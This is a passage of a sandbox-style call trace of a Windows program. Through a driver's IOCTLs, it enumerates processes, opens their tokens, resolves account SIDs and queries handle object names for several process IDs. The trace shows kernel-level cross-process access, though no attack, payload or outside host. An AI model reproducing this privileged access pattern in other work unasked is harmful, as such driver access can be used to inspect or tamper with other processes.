ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.290] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.290] PsReleaseProcessExitSynchronization () returned 0x2 [0158.290] ObfDereferenceObject (Object=0xfffffa80020c8b30) returned 0x12 [0158.290] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002ff8044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002ff8044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.290] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.290] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.290] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xc8 [0158.290] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.290] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020d37a0, HandleInformation=0x0) returned 0x0 [0158.290] ObOpenObjectByPointer (in: Object=0xfffffa80020d37a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.290] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x14 [0158.290] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.291] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.291] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.291] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.291] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.293] CloseHandle (hObject=0xc4) returned 1 [0158.293] CloseHandle (hObject=0xc8) returned 1 [0158.293] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.293] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.293] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.293] PsAcquireProcessExitSynchronization () returned 0x0 [0158.293] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0) [0158.293] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020b0340, HandleInformation=0x0) returned 0x0 [0158.293] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.293] PsReleaseProcessExitSynchronization () returned 0x2 [0158.293] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0158.293] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d5044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.293] ObfDereferenceObject (Object=0xfffffa80020b0340) returned 0x1 [0158.293] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.294] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x7c, lpOverlapped=0x0) returned 1 [0158.294] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.294] PsAcquireProcessExitSynchronization () returned 0x0 [0158.294] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0) [0158.294] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020debe0, HandleInformation=0x0) returned 0x0 [0158.294] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.294] PsReleaseProcessExitSynchronization () returned 0x2 [0158.294] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0158.294] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d4044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.294] ObfDereferenceObject (Object=0xfffffa80020debe0) returned 0x1 [0158.294] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.294] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.294] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.294] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.294] PsLookupProcessByProcessId (in: ProcessId=0x924, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.294] PsAcquireProcessExitSynchronization () returned 0x0 [0158.294] KeStackAttachProcess (in: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d37a0, ApcState=0xfffff880051635d0) [0158.294] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.294] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.295] PsReleaseProcessExitSynchronization () returned 0x2 [0158.295] ObfDereferenceObject (Object=0xfffffa80020d37a0) returned 0x12 [0158.295] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030cb044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030cb044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.295] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.295] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.295] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x934) returned 0xc8 [0158.295] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.295] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020d7b30, HandleInformation=0x0) returned 0x0 [0158.295] ObOpenObjectByPointer (in: Object=0xfffffa80020d7b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.295] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x14 [0158.295] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.295] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.295] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.295] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.295] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.298] CloseHandle (hObject=0xc4) returned 1 [0158.298] CloseHandle (hObject=0xc8) returned 1 [0158.298] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.298] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.298] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.298] PsAcquireProcessExitSynchronization () returned 0x0 [0158.298] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0) [0158.298] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020e84a0, HandleInformation=0x0) returned 0x0 [0158.298] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.298] PsReleaseProcessExitSynchronization () returned 0x2 [0158.298] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0158.298] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030bf044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030bf044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.298] ObfDereferenceObject (Object=0xfffffa80020e84a0) returned 0x1 [0158.298] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.298] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.299] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0158.299] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.299] PsAcquireProcessExitSynchronization () returned 0x0 [0158.299] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0) [0158.299] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020e8070, HandleInformation=0x0) returned 0x0 [0158.299] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.299] PsReleaseProcessExitSynchronization () returned 0x2 [0158.299] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0158.299] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030e0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030e0044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.299] ObfDereferenceObject (Object=0xfffffa80020e8070) returned 0x1 [0158.299] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.299] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.299] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.299] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.299] PsLookupProcessByProcessId (in: ProcessId=0x934, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.299] PsAcquireProcessExitSynchronization () returned 0x0 [0158.300] KeStackAttachProcess (in: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020d7b30, ApcState=0xfffff880051635d0) [0158.300] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.300] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.300] PsReleaseProcessExitSynchronization () returned 0x2 [0158.300] ObfDereferenceObject (Object=0xfffffa80020d7b30) returned 0x12 [0158.300] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80030d7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80030d7044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.300] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.300] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.300] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x944) returned 0xc8 [0158.300] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.300] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020fc740, HandleInformation=0x0) returned 0x0 [0158.300] ObOpenObjectByPointer (in: Object=0xfffffa80020fc740, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.300] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x14 [0158.300] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.300] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.300] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.300] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.301] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.303] CloseHandle (hObject=0xc4) returned 1 [0158.303] CloseHandle (hObject=0xc8) returned 1 [0158.303] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.303] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.303] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.303] PsAcquireProcessExitSynchronization () returned 0x0 [0158.303] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0) [0158.303] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020d7510, HandleInformation=0x0) returned 0x0 [0158.303] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.303] PsReleaseProcessExitSynchronization () returned 0x2 [0158.303] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0158.303] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030d6044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80030d6044, ReturnLength=0xfffff88005163508) returned 0x0 [0158.303] ObfDereferenceObject (Object=0xfffffa80020d7510) returned 0x1 [0158.304] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.304] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.304] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x76, lpOverlapped=0x0) returned 1 [0158.304] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.304] PsAcquireProcessExitSynchronization () returned 0x0 [0158.304] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0) [0158.304] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80020fccb0, HandleInformation=0x0) returned 0x0 [0158.304] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.304] PsReleaseProcessExitSynchronization () returned 0x2 [0158.304] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0158.304] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800302e584, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa800302e584, ReturnLength=0xfffff88005163508) returned 0x0 [0158.304] ObfDereferenceObject (Object=0xfffffa80020fccb0) returned 0x1 [0158.304] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.304] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.304] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.304] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0158.305] PsLookupProcessByProcessId (in: ProcessId=0x944, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.305] PsAcquireProcessExitSynchronization () returned 0x0 [0158.305] KeStackAttachProcess (in: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020fc740, ApcState=0xfffff880051635d0) [0158.305] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0158.305] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.305] PsReleaseProcessExitSynchronization () returned 0x2 [0158.305] ObfDereferenceObject (Object=0xfffffa80020fc740) returned 0x12 [0158.305] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8002f9c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f9c044, ReturnLength=0xfffff88005163550) returned 0x0 [0158.305] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x53 [0158.305] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.305] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0158.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xc8 [0158.305] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0158.305] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8002108790, HandleInformation=0x0) returned 0x0 [0158.305] ObOpenObjectByPointer (in: Object=0xfffffa8002108790, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff80000814) returned 0x0 [0158.306] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x14 [0158.306] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000814, DesiredAccess=0x8, TokenHandle=0xfffffa8003a14cc0 | out: TokenHandle=0xfffffa8003a14cc0*=0xc4) returned 0x0 [0158.306] ZwClose (Handle=0xffffffff80000814) returned 0x0 [0158.306] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0158.306] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0158.306] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0158.309] CloseHandle (hObject=0xc4) returned 1 [0158.309] CloseHandle (hObject=0xc8) returned 1 [0158.309] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0158.309] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0158.309] PsLookupProcessByProcessId (in: ProcessId=0x954, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0158.309] PsAcquireProcessExitSynchronization () returned 0x0 [0158.309] KeStackAttachProcess (in: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8002108790, ApcState=0xfffff880051635d0) [0158.309] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800210d2b0, HandleInformation=0x0) returned 0x0 [0158.309] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0158.309] PsReleaseProcessExitSynchronization () returned 0x2 [0158.309] ObfDereferenceObject (Object=0xfffffa8002108790) returned 0x12 [0158.310] 